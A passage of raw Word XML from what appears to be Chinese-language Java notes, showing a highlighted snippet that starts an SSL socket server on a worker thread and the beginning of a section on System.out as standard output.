          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"SSLServer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>启动前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D0A8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">ExecutorService </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">executorService = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Executors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>newSingleThreadExecutor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        executorService.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(() -&gt; {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">//        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>新建一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">SSL socket server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">SSLServer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">server = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D0A8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SSLServer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">//        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用本机的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1234</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">try </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D0BF69"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>12345</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">catch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Exception </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                e.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>printStackTrace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"SSLServer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">try </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"I am server ,Hello ..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D0BF69"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4096</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">catch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Exception </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                e.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>printStackTrace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40451B8C" w14:textId="77777777" w:rsidR="00AE51E5" w:rsidRPr="00AE51E5" w:rsidRDefault="00AE51E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C8816CA" w14:textId="77777777" w:rsidR="00AE51E5" w:rsidRDefault="00AE51E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="255AE5E3" w14:textId="77777777" w:rsidR="00AE51E5" w:rsidRDefault="00AE51E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B65B708" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="729" w:name="_Toc159780158"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>system:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统类</w:t>
      </w:r>
      <w:bookmarkEnd w:id="729"/>
    </w:p>
    <w:p w14:paraId="182B7ADC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System.out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5715124D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">System.out </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>标准输出</w:t>
